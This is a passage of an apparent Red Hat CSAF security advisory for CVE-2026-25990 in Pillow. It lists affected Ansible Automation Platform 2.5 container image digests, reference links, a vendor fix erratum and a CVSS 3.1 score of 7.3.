"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T22:34:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.5#Upgrading",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6308"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
